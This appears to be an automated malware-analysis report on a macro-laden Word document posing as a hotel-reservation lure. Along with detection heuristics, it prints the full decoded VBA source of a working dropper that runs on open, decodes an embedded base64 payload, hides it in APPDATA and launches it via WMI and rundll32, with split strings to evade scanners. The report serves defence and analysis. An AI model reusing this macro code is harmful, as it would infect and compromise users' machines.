MALICIOUS
430
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The sample is a malicious OOXML document containing VBA macros. The AutoOpen macro executes a payload using CreateObject and GetObject calls, specifically leveraging WMI to launch a process. The document body is a lure for hotel reservations, aiming to collect credit card information. The VBA macro is designed to download and execute a second-stage payload, as indicated by the use of WMI to create a process.
Heuristics 10
-
ClamAV: Doc.Malware.Emodldr-10029363-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10029363-0
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3940 bytes |
SHA-256: 56c969cf57f82bb252140dca1f47ca971bb5c098a7e5630e3bf0323be3ad7226 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Execute
End Sub
Private Function DecodeBase64(base64) As Byte()
Const decodeTable = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
If 0 <> Len(base64) Mod 4 Then
Exit Function
End If
outputLen = (Len(base64) / 4) * 3
If "=" = Mid(base64, Len(base64), 1) Then
outputLen = outputLen - 1
End If
If "=" = Mid(base64, Len(base64) - 1, 1) Then
outputLen = outputLen - 1
End If
Dim decodedBytes() As Byte
ReDim decodedBytes(outputLen - 1)
outputIndex = 0
For quartet = 1 To Len(base64) Step 4
groupBase64Number = 0
Const base = 64
realBytesInThisGroup = 3
For i = 0 To 3
inputChar = Mid(base64, quartet + i, 1)
indexInTable = 0
If "=" = inputChar Then
realBytesInThisGroup = realBytesInThisGroup - 1
Else
indexInTable = InStr(1, decodeTable, inputChar, vbBinaryCompare) - 1
End If
If -1 = indexInTable Then
Exit Function
End If
groupBase64Number = (groupBase64Number * base) + indexInTable
Next
groupBase64Number = Hex(groupBase64Number)
'add leading zeroes, lengt of hex = 6:
groupBase64Number = String(6 - Len(groupBase64Number), "0") & groupBase64Number
'split hex number into 3 groups, 2 hex characters each:
decodedBytes(outputIndex) = CByte("&H" & Mid(groupBase64Number, 1, 2))
outputIndex = outputIndex + 1
If realBytesInThisGroup > 1 Then
decodedBytes(outputIndex) = CByte("&H" & Mid(groupBase64Number, 3, 2))
outputIndex = outputIndex + 1
If realBytesInThisGroup > 2 Then
decodedBytes(outputIndex) = CByte("&H" & Mid(groupBase64Number, 5, 2))
outputIndex = outputIndex + 1
End If
End If
Next
DecodeBase64 = decodedBytes
End Function
Private Sub Execute()
Dim Path As String
Dim FileNum As Long
Dim xml() As Byte
Dim bin() As Byte
Const HIDDEN_WINDOW = 0
strComputer = "."
'extract and decode encoded file
xml = ActiveDocument.WordOpenXML
Set xmlParser = CreateObject("Msxml2.DOMDocument")
If Not xmlParser.LoadXML(xml) Then
Exit Sub
End If
Set currNode = xmlParser.DocumentElement
Set selected = currNode.SelectNodes("//HLinks" & "/vt:" & "vector" & "/vt:" & "variant" & "/vt:" & "lpwstr")
If 2 > selected.Length Then
Exit Sub
End If
base64 = selected(1).Text
bin = DecodeBase64(base64)
'save decoded file
Path = Environ("APPDATA") + "\" + "user" + ".dat"
FileNum = FreeFile
If Dir(Path, vbHidden) <> "" Then
Exit Sub
End If
Open Path For Binary Access Write As #FileNum
Put #FileNum, 1, bin
Close #FileNum
SetAttr Path, vbHidden
'execute saved file with WMI
Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
objProcess.Create "run" + "dll" + "32" + ".exe " + Path + ", " + "#1", Null, objConfig, intProcessID
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 15872 bytes |
SHA-256: 3326bdc2007d32cb314968ecccc0735fd05718339058327e564cdc069d369f72 |
|||
|
Detection
ClamAV:
Doc.Malware.Emodldr-10029363-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.